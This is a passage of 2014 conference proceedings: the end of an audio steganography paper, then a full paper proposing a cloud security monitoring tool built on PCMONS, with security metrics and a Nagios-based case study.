the reference steganalysis method uses features extracted from
high frequencies (lower in energy) while in our algorithm we
target high energetic frequency components to embed data. In
addition, the number of low-energy frequency components in
music audio signals is smaller than that in speech signals.
34
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
TABLE IV: STEGANALYSIS RESULTS FOR DATA IN SPEECH AND IN
MUSIC AUDIO SIGNALS
Hiding methods
Audio signal
AC
ROC
proposed
Music
0.504
0.502
Speech
0.558
0.558
Music
0.6
0.598
Speech
0.84
0.84
1
1
0.8
0.8
True Positive Rate
True Positive Rate
[15]
0.6
0.4
[15]
proposed
0.2
0.6
0.4
[15]
proposed
0.2
0
0
0
0.2
0.4
0.6
0.8
1
0
0.2
False Positive Rate
0.4
0.6
0.8
1
False Positive Rate
(a)
(b)
Figure 6: ROC curves for [15] and the proposed method for data-hiding in
speech (6a) versus music (6b) audio signals.
VI.
C ONCLUSION
In this paper, we presented a robust phase audio steganography. This work has a double aim. The first aim is to
benefit from the fact that when phase coding can be used, it
gives better signal to noise ratio. The second is to address
the undetectability issue which is overlooked by most of
the presented work in audio steganography. Perceptual and
steganalysis study results reveal a great potential to hide large
amounts of data, while ensuring their security and preserving
the naturalness of the original signals. In the future, we plan to
extend our work by investigating steganalysis of audio signals
in codec domain.
R EFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
F. Djebbar, B. Ayad, K. A. Meraim, and H. Hamam, ”Comparative
study of digital audio steganography techniques”, EURASIP Journal
on Audio, Speech, and Music Processing, Dec 2012, pp. 1-16.
Avcibas, ”Audio steganalysis with content independent distortion measures”, IEEE Signal Process Letter, 2006, vol. 13, no. 2, pp. 92-95.
Q. Liu, A. H. Sung, and M. Qiao, ”Temporal derivative-based spectrum
and mel-cepstrum audio steganalysis”, IEEE Transactions on Information Forensics and Security, 2009, vol. 4, no. 3, pp. 359-368.
A. Cheddad, J. Condell, K. Curran, and P. Mc Kevit, ”Digital image
steganography: Survey and analysis of current methods”, Signal Processing, Marsh 2010, vol 90, issue 3, pp. 727-752.
F. Djebbar, K. Abed-Maraim, D. Guerchi, and H. Hamam, ”Dynamic
energy based text-in-speech spectrum hiding using speech masking
properties”, 2nd International Conference on Industrial Mechatronics
and Automation (ICIMA), May 2010, vol.2, pp. 422426.
R. Balaji and G. Naveen, ”Secure data transmission using video
Steganography”, IEEE International Conference on Electro/Information
Technology (EIT), May 2011, pp. 1-5.
M. Shirali-Shahreza and S. Shirali-Shahreza, ”Persian/Arabic Unicode
Text Steganography”, SIAS Fourth International Conference on Information Assurance and Security, Sept. 2008, pp. 62-66.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[8] G. Handel Theodore and T. Maxwell Sandford II, ”Hiding Data in the
OSI Network Model”, Information hiding: first international workshop,
Cambridge, UK. Lecture Notes in Computer Science, 1996, vol. 1174,
pp. 23-38.
[9] N. Cvejic and T. Seppanen, ”Increasing Robustness of LSB Audio
Steganography Using a Novel Embedding Method”, Proceedings of
the International Conference on Information Technology: Coding and
Computing (ITCC’04), 2004, vol. 2, pp. 533537.
[10] M. A. Ahmed, M. L. M. Kiah, B. B. Zaidan, and A. A. Zaidan, ”A
novel embedding method to increase capacity and robustness of lowbit encoding audio steganography technique using noise gate software
logic algorithm”, Journal of Applied Sciences, 2010, vol. 10, pp. 59-64.
[11] X. Dong, M. Bocko, and Z. Ignjatovic, ”Data hiding via phase manipulation of audio signals”, IEEE International Conference on Acoustics,
Speech, and Signal Processing, 2004. Proceedings (ICASSP’04), vol.
5, pp. 377-380.
[12] K. Gopalan, ”Audio steganography using bit modification”, Proceedings
of the IEEE International Conference on Acoustics, Speech, and Signal
Processing, (ICASSP’2003), vol. 2, pp. 421-424.
[13] S. Shirali-Shahreza and M. Shirali-Shahreza, ”High capacity error
free wavelet domain speech steganography”, Proc. 33rd Int. Conf. on
Acoustics, Speech, and Signal Processing (ICASSP 2008), Las Vegas,
Nevada, USA, pp. 17291732.
[14] N. Cvejic and T. Seppanen, ”A wavelet domain LSB insertion algorithm
for high capacity audio steganography”, Proc. 10th IEEE Digital Signal
Processing Workshop and 2nd Signal Processing Education Workshop,
Georgia, USA, October 2002, pp. 5355.
[15] F. Djebbar, H. Hamam, K. Abed-Meraim, and D. Guerchi, ”Controlled
distortion for high capacity data-in-speech spectrum steganography”,
International Conference on Intelligent Information Hiding and Multimedia Signal Processing (IEEE-IIHMSP), ISBN: 978-0-7695-4222-5,
2010, pp. 212-215.
[16] Steghide, http://steghide.sourceforge.net/. Retrieved 28 Sept, 2014.
[17] Stools Version 4.0, http://info.umuc.edu/its/online lab/ifsm459/
s-tools4/. Retrieved 28 Sept, 2014.
[18] Hide4PGP, http://www.heinz-repp.onlinehome.de/Hide4PGP.htm. Retrieved 28 Sept, 2014.
[19] G. S. Kang, T. M. Moran, and D. A. Heide, ”Hiding Information
Under Speech”, Naval Research Laboratory, http://handle.dtic.mil/100.
2/ADA443638, Washington, 2005.
[20] B. Paillard, P. Mabilleau, S. Morissette, and J. Soumagne, ”PERCEVAL:
Perceptual Evaluation of the Quality of Audio Signals”, journal of
Audio Engeneering Society, 1992, vol. 40, pp. 21-31.
[21] Y. Hu and P. Loizou, ”Evaluation of objective quality measures for
speech enhancement”, IEEE Transactions on Speech and Audio Processing, 16(1), 2008, pp. 229-238.
[22] N. Cristianini and J. Shawe-Taylor, ”An introduction to Support Vector
Machines”, Cambridge University Press; 2000.
[23] http://www.csie.ntu.edu.tw/$\sim$cjlin/libsvm. Retrieved 28 Sept,
2014.
35
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Current Issues in Cloud Computing Security and Management
Pedro Artur Figueiredo Vitti, Daniel Ricardo dos Santos,
Carlos Becker Westphall, Carla Merkle Westphall, Kleber Magno Maciel Vieira
Network and Management Laboratory - Department of Informatics and Statistics
Federal University of Santa Catarina - Florianopolis, Santa Catarina, Brazil
{pvitti, danielrs, westphal, carlamw, kleber}@inf.ufsc.br
Abstract—Cloud computing is becoming increasingly more popular and telecommunications companies perceive the cloud as
an alternative to their service deployment models, one that
brings them new possibilities. But to ensure the successful use of
this new model there are security and management challenges
that still need to be faced. There are numerous threats and
vulnerabilities that become more and more important as the use
of the cloud increases, as well as concerns with stored data and
its availability, confidentiality and integrity. This situation creates
the need for monitoring tools and services, which provide a way
for administrators to define and evaluate security metrics for their
systems. In this paper, we propose a cloud computing security
monitoring tool based on our previous works on both security
and management for cloud computing.
Keywords–cloud computing; security management; monitoring;
security metrics
I. I NTRODUCTION
Cloud computing is a new way to provide computational
resources over the Internet in a transparent and easy manner.
According to the National Institute of Standards and Technology (NIST), it is a model for enabling on-demand network
access to a shared pool of computational resources, comprised
of three service models and four deployment models [1].
These service models are: Software as a Service (SaaS),
in which the service provided to the user is in the form of
an application that runs on a cloud infrastructure; Platform
as a Service (PaaS), in which the user can deploy its own
applications in the provider’s infrastructure; and Infrastructure
as a Service (IaaS), in which the user has access to the
computational resources themselves, in the form of virtual
machines, storage, networks and others.
The deployment models are the private, community, public
and hybrid cloud, and refer to the location of the cloud
infrastructure, who has access to it and who is responsible
for its management. The most used models are the public
cloud, when the infrastructure is run by an organization and
provisioned to be used by the public; and the private cloud,
when an organization provisions its own infrastructure to be
used by their business units.
In an era where telecommunication providers face ever
greater competition and technology evolution, the basic features of cloud computing such as virtualization, multi-tenancy
and ubiquitous access provide a viable solution to their service
provisioning problems.
Telecoms are now using their own private clouds, or
sometimes public clouds, to host their services and enjoy the
benefits of this new model. With a multi-tenant cloud they can
support an increasing number of subscribers and maintain the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Quality of Experience of their services even when dealing with
high demand. The use of the cloud also helps these companies
transition from a product based business model to a service
based one.
The main advantages of cloud computing are the reduction
of IT costs and increased flexibility, scalability and the possibility to pay only for the used resources. The users of the
cloud range from individuals to large government or commercial organizations, and each one has their own concerns and
expectations about it.
Among these concerns, security and privacy are the biggest
ones [2]. This comes from the fact that the data that belongs to
users and organizations may no longer be under their absolute
control, being now stored in third party locations and subject
to their security policies, in the case of public clouds.
But even in private clouds, the most common case in
telecom companies, there are new security challenges, such
as providing access to an ever growing number of users while
maintaining efficient and well monitored access control.
It becomes necessary to characterize what are the new risks
associated with the cloud and what other risks become more
critical. These risks must be evaluated and mitigated before
the transition to the cloud.
It is already possible to find in the literature a lot of work
being done in the security aspects of Cloud Computing, describing its challenges and vulnerabilities and even proposing
some solutions [3].
In the rest of this paper, we provide some background in security concerns in cloud computing, briefly describe a previous
implementation of a monitoring tool for the cloud, show how
security information can be summarized and treated under a
management perspective in an Service Level Agreement (SLA)
and then propose a system for monitoring security information
in the cloud.
In Section II, some works, related to security in cloud
computing environments, are cited. In Section III, currently
existing concerns in cloud computing security area are presented. In Section IV, an architecture for monitoring clouds is
described. In Sections V and VI, safety concerns with SLA,
and the definition of entities, components, metrics and, actions
of security monitoring cloud computing are shown. Section VII
shows the case study. In Section VIII, lessons learned from
this work are described. Finally, in Section IX, a conclusion
is presented and some future work proposals are made.
II. R ELATED W ORK
Uriarte and Westphall [4] proposed a monitoring architecture devised for private Cloud that focuses on providing data
36
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
analytics capabilities to a monitoring system and that considers
the knowledge requirements of autonomic systems. While, argue that in the development of an analytical monitoring system
for public Clouds, security, privacy and different policies need
to be considered, their proposal does not consider specific
security metrics and Sec-SLAS.
Fernades et al. [5] surveys the works on cloud security
issues. Their work addresses several key topics, namely vulnerabilities, threats, and attacks, and proposes a taxonomy for
their classification. Their work, however, does not consider
metrics monitoring or any implementation details.
CSA [6] has identified the top nine cloud computing
threats. The report shows a consensus among industry experts,
focusing on threats specifically related to the distributed nature
of cloud computing environments. Despite identifying, describing and analyzing these threats, their work does not consider
the monitoring of security metrics related to the identified
threats.
Murat et al. [7] proposed a cloud network security monitoring and response system, which is based on flow measurements
and implements an algorithm that detects and responds to
network anomalies inside a cloud infrastructure. Their proposal
however does not take into account security metrics and SecSLAs, instead it generates and monitors profiles of network
traffic to detect for anomalies, hence it is limited in the scope
of security issues it can monitor.
III. S ECURITY C ONCERNS IN C LOUD C OMPUTING
A. Technologies
A lot of different technologies are necessary to create
and manage a cloud environment, according to the kind of
service that this cloud will provide. Cloud computing relies
heavily on virtualization and network infrastructure to support
its elasticity. Technologies such as Web Services, Service
Oriented Architecture (SOA), Representational State Transfer
(REST) and Application Programming Interfaces (API) are
employed to provide users with access to their cloud resources.
Each of these technologies presents some kind of known
vulnerability and possible new exploits in the cloud [8].
B. Challenges, Threats and Vulnerabilities
The usual three basic issues of security: availability, integrity and confidentiality are still fundamental in the cloud
and remain a big challenge in this scenario. Each sector
has its main concerns when it comes to the cloud. Industry
services are mostly worried about availability, so that they
keep providing services even during peaks of access, while
academia may be more concerned with integrity and individual
users usually care about the confidentiality of their data. But
every security aspect must be considered together to achieve
security as a whole in this scenario. Because of the multitenant characteristic of cloud computing, one single vulnerable
service in a virtual machine may lead to the exploitation of
many services hosted in the same physical machine. Also,
virtualization has an inherent security threat that a user may
escape its confined environment and gain access to the physical
machine resources or to other virtual machines. This requires
complex attacks, but is possible.
Web applications and web services have a long history of
security vulnerabilities, and if not well implemented they are
susceptible to a lot of easily deployed and very well-known
attacks such as SQL injection, Cross-Site Scripting (XSS),
Cross-Site Request Forgery (CSRF) and session hijacking.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Cryptography is the most important technology to provide
data security in the cloud, but problematic implementations
and weak proprietary algorithms have been known problems
for a long time and are still exploited.
Another important topic in cloud security is Identity and
Access Management, because now data owners and data
providers are not in the same trusted domain. New mechanisms for authentication and authorization that consider cloudspecific aspects are needed and are being actively researched
[9].
The main security management issues of a Cloud Service
Provider (CSP) are: availability management, access control
management, vulnerability management, patch and configuration management, countermeasures, and cloud usage and
access monitoring [10].
To remain effective in this new paradigm, some security
tools have to be adapted, such as Intrusion Detection Systems
(IDS), which are critical to monitor and prevent incidents in
the cloud. Because of its distributed nature, the cloud is an
easy target for an intruder trying to use its abundant resources
maliciously, and because of this nature, the IDS also has to be
distributed, to be able to monitor each node [11].
C. Attacks
While the cloud serves many legitimate users, it may also
host malicious users and services, such as spam networks,
botnets and malware distribution channels. Cloud providers
must be aware of those problems and implement the necessary
countermeasures.
Besides that, Distributed Denial of Service (DDoS) attacks
can have a much broader impact on the cloud, since now many
services may be hosted in the same machine. When an attacker
focuses on one service it may affect many others that have no
relation with the main target. DDoS is a problem that is still
not very well handled. On the other hand, since the cloud
provides greater scalability and may allocate resources almost
instantaneously it becomes more resilient to denial of service,
but it comes with a cost to the users.
D. Data Security
The security and privacy of the data stored in the cloud
is, perhaps, the most important challenge in cloud security. To
maintain data security a provider must include, at least: an
encryption schema, an access control system, and a backup
plan [12].
However, data encryption can be a hindrance in the cloud
because of the current impossibility to efficiently process or
query over encrypted data [2]. There is active research in
these areas, with techniques such as Searchable Encryption
and Fully Homomorphic Encryption, but their applications
are still limited and they cannot yet be used in large scale
environments.
When moving to the cloud it is important that a prospective
customer knows to what risks its data are being exposed. Some
of the key points a user must consider in this migration are
[13]: The cloud administrators will have privileged access to
user data, and possibly bypass access controls; The provider
must comply to legal requirements, depending on the kind of
data the user intends to store; The location of the user’s data
may now be unknown to them; How the data of one user are
kept separate from others; The provider must have a capacity
to restore a system and recover its data through backup and
replication; The provider must formally ensure full support in
37
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
the case of an investigation over inappropriate activities; and
The data must be in a standardized format and be available to
the user even in the case the provider goes out of business.
E. Legal Compliance
Legal compliance is fundamental when dealing with cloud
computing. In the cloud world, it is possible that data cross
many jurisdiction borders and have to be treated in compliance
to many different laws and regulations. This is one of the
reasons why security plays such an important role in cloud
adoption and development, especially for the CSPs.
To achieve compliance both providers and users must be
held responsible for how data is collected, stored and transmitted, especially sensitive data, such as Personally Identifiable
Information (PII).
Among the most important tools to ensure legal compliance
are external audits and security certifications.
F. Telecommunications
The deployment and provisioning of telecommunication
services becomes easier in the cloud, and it empowers telecom
providers with greater scalability and flexibility. Those advantages, however, come with the cost of new security challenges.
Security plays such a vital role in telecommunications that
many telecommunication networks are built from the groundup with security requirements in mind. This, however, is not
true for many Internet protocols. When transitioning to the
cloud, telecom providers must be aware that their services are
being deployed in a different scenario, one that has to be well
understood before this transition is considered.
Availability, for instance, is critical to the telecom business
and if services are being deployed in a public cloud without
a proper SLA, server downtime will cause a lot of trouble.
Confidentiality is also fundamental, since telecoms collect and
store a lot of data from their clients, from personal data to
information about their communications.
IV. C LOUD M ONITORING
The provisioning of cloud services represents a challenge
to service monitoring. It requires complex procedures to be
well accomplished, which leads to the development of new
management tools. Our team has previously proposed and
implemented an open-source cloud monitoring architecture and
tool called the Private Cloud Monitoring System (PCMONS)
[14].
The architecture of the system is divided in three layers
(see Figure 1):
• Infrastructure - Consists of basic facilities, services
and installations and available software, such as operating systems and hypervisors;
• Integration - Responsible for abstracting the infrastructure details for the view layer; and
• View - The interface through which information is
analyzed.
The main components of the architecture are (see Figure
1):
• Node information gatherer: Gathers local information
on a node;
• VM monitor - Injects scripts into the virtual machine
(VM) that send data to the monitoring system;
• Configuration Generator - Generates the configuration
files for the tools in the view layer;
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
•
•
Monitoring tool server - Receives data form different
resources and take actions such as storing it;
Database - Stores data needed by the Configuration
Generator and the Monitoring Data Integrator.
V. S ECURITY C ONCERNS IN SLA
Security is not only a matter of preventing attacks and
protecting data, it also has to be considered in a management
perspective. Providers must have ways to ensure their clients
that their data is safe and must do so by monitoring and
enhancing security metrics.
A SLA formally defines the level of service a provider
must guarantee. SLAs are a fundamental part of network
management, and are also applied in cloud computing. They
are defined in terms of metrics that must be monitored to
ensure that the desired levels of service are reached.
SLAs may also be used in the definition, monitoring and
evaluation of security metrics, in the form of Security SLAs,
or Sec-SLAs [15]. In this case, the SLA considers security
service levels.
To accomplish this, the first step is to define a set of
security metrics, which in itself is not easy. Though there is not
a definitive set of security metrics that is considered relevant in
every case, researchers tend to use or adapt concepts gathered
from international standards such as ISO 27002. Some issues
that are usually considered are cryptography, packet filtering,
redundancy, availability, and backup.
VI. C LOUD S ECURITY M ONITORING
Security monitoring is inherently hard, because the agentmanager approach normally used in the monitoring of other
kinds of SLA, does not fit easily to every security characteristic
[15].
Cloud computing has been evolving for many years and so,
only now we are able to have a broader view of what exactly
it is and hence what are its security requirements, based on
recent definitions and publications.
With this new perspective it is now possible to define good
security metrics that can be used to provide a clear view of
the level of security being employed in a CSP and its virtual
machines.
We now propose an extension to the PCMONS architecture
and tool to enable security monitoring for cloud computing. We
also present the security metrics which we consider adequate
to be monitored in a cloud infrastructure and which provide a
good picture of security as a whole in this environment.
The tool uses data and logs gathered from security software
available in the monitored systems, such as IDSs, anti-malware
software, file system integrity verification software, backup
software and web application firewalls, and presents these data
to the cloud administrators.
Besides providing to administrators reliable metrics and
information about the security of their systems, this monitoring
architecture can also be used in the auditing and outsourcing
of security services.
The main components of the proposal can be seen in Figure
1 and are described below.
A. Entities
The entities involved in the definition, configuration and
administration of the security SLAs and metrics are:
• Cloud users - The users of the cloud infrastructure.
They negotiate the SLAs with the CSP and expect
38
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 1. Three Layers Monitoring Architecture
them to be accomplished;
Cloud administrators - The administrators of the CSP.
Their role is to monitor the cloud infrastructure; and
• Security applications - The applications which produce the security information that will be gathered.
The two first entities were a part of the previous PCMONS,
while the third one was inserted in our extension.
•
B. Components
Since PCMONS is modular and extensible, the components
used in the new architecture are the same already available, but
with extensions that allow the monitoring of security metrics.
The extensions are new scripts to gather the security
data from the many sources needed and an extension to the
visualization tool to show this data.
C. Metrics
As mentioned in Section IV, the definition of security
metrics is not an easy task, and it becomes even harder in
the cloud.
Here, we present the basic metrics we intended to monitor.
These metrics were chosen because we consider they cover a
great part of what was considered critical in a cloud provider,
based on the survey presented in Section II.
We divided the set of metrics into subsets related to each
security aspect that will be treated. There are four subsets of
metrics. The first three are related to each individual virtual
machine. Data Security Metrics, Access Control Metrics and
Server Security Metrics are shown in Table I, Table II, and
Table III, respectively.
D. Actions
We decided to introduce a new module to take actions
based on the monitored metrics and possible violations to the
Sec-SLA. As an example, if a virtual machine has had a huge
number of failed access attempts in the last hours we may want
to lock any further access to it and communicate the possible
issue to the administrator of that machine. Also, if malware
was detected on a machine we may want to shut it down
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
to prevent it from infecting other VMs in the same physical
machine. These actions will be predefined scripts available to
cloud administrators and may be enabled or disabled by them
at any time.
VII. C ASE STUDY
We have implemented the metrics presented in Tables IIII and gathered the data generated in a case study. The
implementation of the data gathering scripts was done in
Python and the data shown in the Nagios interface.
Our infrastructure consisted of two physical servers, one
hosting the OpenNebula cloud platform and another hosting
the virtual machine instances.
Several virtual machines running the Ubuntu operating
system and the security software needed to provide the security
metrics were instantiated. The following software were used to
gather the security information: dm-crypt (encryption), rsync
(backup), tripwire (filesystem integrity), ssh (remote access),
clamAV (anti-malware), tiger (vulnerability assessment) and
uptime (availability).
The VMs were automatically attacked by brute force login
attempts and malware being downloaded and executed, as well
as access attempts to ports blocked by the firewall. During
the tests there were also simulations of regular usage, encompassing valid accesses and simple user tasks performed on the
machines, such as creating and deleting files. The malware
scans, vulnerability scans, integrity checks and backups were
performed as scheduled tasks on the operating system using
latest versions of Linux Malware Detect [16], OpenVAS [17],
AFICK [18] and, Amanda [19] respectively. We did not stress
the environment to test for scalability issues because it had
already been done with the previous versions of PCMONS.
Figure 2 shows an example of an early snapshot of the
monitoring environment. It represents how the metrics are
shown in Nagios and it is possible to see the vision that a
network administrator has of a single machine. The metrics
HTTP CONNECTIONS, LOAD, PING, RAM and SSH are
from the previous version of PCMONS and are not strictly
related to security, but they are show combined.
39
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
TABLE I. DATA SECURITY METRICS
Metric
Encrypted Data?
Encryption Algorithm
Last backup
Last integrity check
Description
Indicates whether the data stored in the VM is encrypted
The algorithm used in the encryption/decryption process
The date and time when the last backup was performed
The date and time when the last file system integrity check was
performed
TABLE II. ACCESS CONTROL METRICS
Metric
Valid Accesses
Failed access attempts
Password change interval
Description
The number of valid access attempts in the last 24 hours
The number of failed access attempts in the last 24 hours
The frequency with which users must change passwords in the VM’s
operating system
TABLE III. SERVER SECURITY METRICS
Metric
Malware
Last malware scan
Vulnerabilities
Last vulnerability scan
Availability
Description
Number of malware detected in the last anti-malware scan
The date and time of the last malware scan in the VM
Number of vulnerabilities found in the last scan
The date and time of the last vulnerability scan in the VM
Percentage of the time in which the VM is online
It is important to notice that the accuracy of the obtained
information depends on the security software being monitored.
Our solution aggregates these data to present it in a way that
is more clear and easy to monitor. The tool helps network
and security administrator perceive violations to Sec-SLAs and
actively respond to threats.
In this case study, considering the automatic attacks previously described, the most violated metrics were the failed
access attempts and the anti-malware events, as well as availability, because of malware that would cause denial of service.
Since we obtained a high number of violations in an
environment that was supposed to be under constant attack, it
suggests that the chosen metrics are good indicators of overall
security for the virtual machines.
VIII. K EY L ESSONS L EARNED
A. Background
Monitoring and managing security aspects remains a challenge that has to be faced to enable the full potential of the
cloud and only now, with a recent agreed upon definition of
exactly what is cloud computing, this can be achieved. The
major piece of technology used to provide security in the cloud
is cryptography.
Data leakage and data loss are possibly the greatest concerns of cloud users. If the CSP acts unfaithfully the users may
not even become aware of incidents that compromise their data.
There must be ways to verify data integrity, so that users are
certain their data were not corrupted. Backup and recovery are
also fundamental tools to ensure the availability of customer
data.
The greatest challenge to security monitoring in a cloud
environment is the fact that the cloud provides services on
demand, creating a highly dynamic and flexible system to
which the metrics have to be adapted.
SLAs are fundamental to provide customers with the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
needed guarantees that the service they are hiring will be
adequately provided, their machines will be secure and their
data will be securely stored, transmitted and processed.
Security metrics and a more quantitative approach to security, in both the definition of requirements and their monitoring,
remain an important open research topic.
There are other important security metrics that are related
to the security processes of the CSP, such as employee training,
physical security and contingency plans. These were not taken
into account in this work because they cannot be automatically
gathered and monitored.
B. Design and Implementation
The design of a software project and related architectural
decisions may consume a great time before the implementation
is even started. Building an extension over a previous architecture, as was our case, may greatly reduce this time.
Nevertheless, many important decisions have to be made
to achieve a final functioning software. The major decisions in
this case were related to the security metrics and the software
used to provide the necessary security data.
As already stated in this paper, defining and quantifying
security is no easy task, therefore it was the most time
consuming aspect of the project. Trying to come up with a
simple set of metrics that represent the state of security of a
whole cloud not only seems, but definitely is a daunting task.
Something that became clear with this implementation is
that no single set of metrics can embrace every security need,
and so to define the metrics we based our approach on the
common security issues described in the literature, as well as
issues that are consistently cited as the most critical by industry
users. It is also important to note that the definition and
monitoring of metrics must be flexible enough to accommodate
different potential uses of the software.
After defining what is going to be measured it is necessary
40
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 2. Nagios simplified interface of the monitored cloud services
to focus on how to do it. The idea of analyzing logs to obtain
security data is classical in information security and it seemed
like a natural approach to our challenge.
To read, parse and present the data we chose to use the
Python programming language because it already formed the
base of PCMONS and it fits very well these kinds of tasks.
An important aspect of the proposed solution is its modularity. Because of this feature we were able to introduce
the new metrics and adapt it to our needs without changing
anything that was already done in terms of basic monitoring.
We believe the same can be achieved anytime it becomes
necessary to adapt the software to new particular monitoring
needs.
Modularity and extensibility are necessary approaches
when you deal with such dynamic and highly scalable environments, because you have to be certain that you will be
able to adjust the software to your future needs, which may
be very different from current ones. The most challenging
metrics in terms of implementation were those that gathered
data from non-standard security software, such as tripwire,
because we had to understand the data they generated to
interface them with PCMONS. The analysis of our results
shows that PCMONS was able to comply with our defined
set of metrics, since their implementation relied on established
security software, and that the definition and implementation
of new metrics may be done in the future without the need for
a great architectural redesign.
C. Testing Environment
Setting up a reliable testing environment was also extremely important to the success of the project. Setting up
a private cloud is often advertised as being simple and
convenient, but that is not always true when we have to
deal with specificities of architectures, operating systems and
hypervisors.
Our private cloud has been evolving for some years and
through the realization of other projects we were able to gather
experience on deploying, managing and monitoring it, which
allowed us to choose tools we already knew would work well
together.
Since the whole cloud infrastructure is built upon a piece of
software, it is important to know that it is stable, reliable, well
documented and provides available support. Our choice for the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
OpenNebula platform came from previous experience with it
and its widespread use by many big players in the industry,
such as Telefonica, Akamai and IBM.
An important feature of this extension of PCMONS is
that it can run over Eucalyptus, OpenNebula and OpenStack,
monitoring virtual machines in every platform. The support for
different cloud platforms reflects the evolution of cloud tools
and a greater effort being made in terms of standardization,
interoperability and portability, all of which are big issues in
cloud computing.
The use of scripting languages in the development process,
such as Python and Bash Script allowed us to define the
metrics, implement and test them on the fly on the testing environment, without needing to stop services, compile software,
test it, compile it again and so on. This approach required less
intensive use of the testing environment during development
and accelerated the whole process.
IX. C ONCLUSION AND FUTURE WORK
This paper described a few of our previous works in the
field of Cloud Computing and how to bring them all together
in order to develop a cloud security monitoring architecture.
The use of cloud computing is a great option for telecommunications companies that want to reduce OPEX and CAPEX
costs and still improve their service provisioning. Security,
nevertheless, must be accurately planned and monitored to
ensure that the transition to the cloud runs smoothly.
The paper described the design and implementation of a
cloud security monitoring tool, and how it can gather data
from many security sources inside VMs and the network in
which the physical machines are to give administrators a clear
view of the security of their systems and allow Cloud Service
Providers to give users guarantees about the security of their
machines and data.
Currently, there are not many solutions to cloud security
monitoring, and this paper shows it is possible to build such
a system based on previous work.
As future work, we can point to the definition and implementation of new metrics and a better integration with existing
Security SLAs, planning to include a new module to treat
possible actions to be taken in response to metric violations,
such as locking a virtual machine or shutting it down.
Also, it would be important to study the integration of the
41
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
security monitoring model with other active research fields in
cloud security, such as Identity and Access Management and
Intrusion Detection Systems.
ACKNOWLEDGEMENT
We would like to thank Salvatore Loreto, Saverio Niccolini
and Vijay Gurbani for their prior review and for their help in
improving the paper.
[20]
D. dos Santos, C. Merkle Westphall, and C. Becker Westphall, “A
dynamic risk-based access control architecture for cloud computing,”
in Network Operations and Management Symposium (NOMS), 2014
IEEE, May 2014, pp. 1–9.
[21] P. Silva, C. Westphall, C. Westphall, M. Mattos, and D. Santos, “An
architecture for risk analysis in cloud,” in ICNS 2014, The Tenth
International Conference on Networking and Services, 2014, pp. 29–33.
R EFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
P. Mell and T. Grance, The nist definition of cloud computing.
[Online]. Available: http://csrc.nist.gov/publications/nistpubs/800145/SP800-145.pdf (2011) [retrieved: Sept, 2014]
K. Ren, C. Wang, and Q. Wang, “Security challenges for the public
cloud,” Internet Computing, IEEE, vol. 16, no. 1, jan.-feb. 2012, pp. 69
–73.
F. Shaikh and S. Haider, “Security threats in cloud computing,” in Internet Technology and Secured Transactions (ICITST), 2011 International
Conference for, 2011, pp. 214–219.
R. B. Uriarte and C. B. Westphall, “Panoptes: A monitoring architecture
and framework for supporting autonomic clouds,” in Network Operations and Management Symposium (NOMS), 2014 IEEE. IEEE, 2014,
pp. 1–5.
D. Fernandes, L. Soares, J. Gomes, M. Freire, and P. Incio,
“Security issues in cloud environments: a survey,” International
Journal of Information Security, vol. 13, no. 2, 2014, pp. 113–
170. [Online]. Available: http://dx.doi.org/10.1007/s10207-013-0208-7
[retrieved: Sept, 2014]
T. T. W. Group et al., “The notorious nine: cloud computing top threats
in 2013,” Cloud Security Alliance, 2013.
M. Mukhtarov, N. Miloslavskaya, and A. Tolstoy, “Cloud network
security monitoring and response system,” vol. 8, no. Special Issue on
Cloud Computing and Services. sai: itssa.0008.2012.020 ITSSA, 2012,
pp. 71–83.
B. Grobauer, T. Walloschek, and E. Stocker, “Understanding cloud
computing vulnerabilities,” Security Privacy, IEEE, vol. 9, no. 2, marchapril 2011, pp. 50 –57.
X. Tan and B. Ai, “The issues of cloud computing security in high-speed
railway,” in Electronic and Mechanical Engineering and Information
Technology (EMEIT), 2011 International Conference on, vol. 8, 2011,
pp. 4358–4363.
F. Sabahi, “Cloud computing security threats and responses,” in Communication Software and Networks (ICCSN), 2011 IEEE 3rd International Conference on, 2011, pp. 245–249.
K. Vieira, A. Schulter, C. Westphall, and C. Westphall, “Intrusion
detection for grid and cloud computing,” IT Professional, vol. 12, no. 4,
2010, pp. 38–43.
L. Kaufman, “Data security in the world of cloud computing,” Security
Privacy, IEEE, vol. 7, no. 4, 2009, pp. 61–64.
S. Chaves, C. Westphall, C. Westphall, and G. Geronimo, “Customer
security concerns in cloud computing,” in ICN 2011, The Tenth International Conference on Networks, 2011, pp. 7–11.
S. De Chaves, R. Uriarte, and C. Westphall, “Toward an architecture for
monitoring private clouds,” Communications Magazine, IEEE, vol. 49,
no. 12, 2011, pp. 130–137.
S. de Chaves, C. Westphall, and F. Lamin, “Sla perspective in security
management for cloud computing,” in Networking and Services (ICNS),
2010 Sixth International Conference on, 2010, pp. 212–217.
R. M. Ryan MacDonald, Linux malware detect. [Online]. Available:
https://www.rfxn.com/projects/linux-malware-detect/ (2014) [retrieved:
Sept, 2014]
R. Deraison, Open vulnerability assessment system. [Online]. Available:
http://http://www.openvas.org/ (2014) [retrieved: Sept, 2014]
E. Gerbier, Another file integrity checker. [Online]. Available:
http://afick.sourceforge.net/ (2014) [retrieved: Sept, 2014]
J. da Silva, Advanced maryland automatic network disk archiver.
[Online]. Available: http://http://www.amanda.org/ (2014) [retrieved:
Sept, 2014]
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
42
